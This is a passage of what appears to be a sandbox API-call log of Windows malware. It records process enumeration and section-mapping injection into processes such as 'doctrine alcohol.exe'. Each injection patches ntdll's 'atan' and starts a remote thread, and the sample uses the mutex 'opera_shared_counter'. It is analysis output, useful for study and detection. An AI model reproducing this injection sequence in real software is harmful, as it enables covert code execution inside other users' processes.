lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0175.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0175.480] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0175.480] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0175.480] CloseHandle (hObject=0xec) returned 1 [0175.480] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0175.480] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0175.480] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0175.480] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.480] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.480] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.480] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0175.480] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.480] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0175.480] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x140000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0175.485] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0175.485] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x150000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0175.485] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0175.486] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0175.486] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0175.486] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0175.486] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0175.486] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0175.486] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0175.486] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0175.486] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0175.486] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0175.486] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0175.487] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0175.487] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0175.487] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0175.487] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0175.487] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0175.487] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0175.487] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0175.487] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0175.487] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0175.487] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0175.488] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0175.488] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0140000) returned 0x881f0 [0175.488] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0175.489] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0175.489] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0175.489] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0175.489] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0175.490] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0175.490] GetLastError () returned 0x0 [0175.490] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0175.490] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0175.490] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0175.490] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0175.491] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0175.493] CloseHandle (hObject=0xfc) returned 1 [0175.493] Sleep (dwMilliseconds=0x1f4) [0176.086] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0176.087] CloseHandle (hObject=0xf8) returned 1 [0176.087] CloseHandle (hObject=0xf4) returned 1 [0176.087] CloseHandle (hObject=0xf0) returned 1 [0176.087] CloseHandle (hObject=0xec) returned 1 [0176.087] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0176.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0176.088] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.088] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.088] CloseHandle (hObject=0xec) returned 1 [0176.088] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0176.088] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0176.088] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0176.088] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.088] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.088] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.088] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0176.088] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.088] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0176.088] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0176.092] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0176.092] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xf0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0176.093] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0176.093] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0176.093] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0176.093] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0176.093] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0176.093] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0176.093] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0176.093] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0176.094] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0176.094] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0176.094] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0176.094] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0176.094] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0176.094] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0176.094] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0176.094] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0176.094] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0176.094] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0176.094] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0176.095] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0176.095] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0176.095] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0176.095] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0176.095] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0176.096] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0176.096] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0176.096] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0176.096] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0176.096] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0176.096] GetLastError () returned 0x0 [0176.096] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0176.096] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0176.096] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0176.096] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0176.097] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0176.098] CloseHandle (hObject=0xfc) returned 1 [0176.098] Sleep (dwMilliseconds=0x1f4) [0176.671] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0176.673] CloseHandle (hObject=0xf8) returned 1 [0176.673] CloseHandle (hObject=0xf4) returned 1 [0176.673] CloseHandle (hObject=0xf0) returned 1 [0176.673] CloseHandle (hObject=0xec) returned 1 [0176.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0176.673] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0176.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0176.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0176.674] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0176.675] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0176.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0176.675] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0176.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0176.676] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.676] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.677] CloseHandle (hObject=0xec) returned 1 [0176.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0176.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0176.677] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.677] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.677] CloseHandle (hObject=0xec) returned 1 [0176.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0176.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x0 [0176.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0176.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.679] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.679] CloseHandle (hObject=0xec) returned 1 [0176.679] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0176.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0176.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.679] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0176.679] CloseHandle (hObject=0xec) returned 1 [0176.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.680] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0176.680] CloseHandle (hObject=0xe8) returned 1 [0176.680] Sleep (dwMilliseconds=0x3e8) [0177.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0177.695] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0177.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0177.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0177.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0177.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0177.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0177.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0177.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0177.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0177.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0177.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0177.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 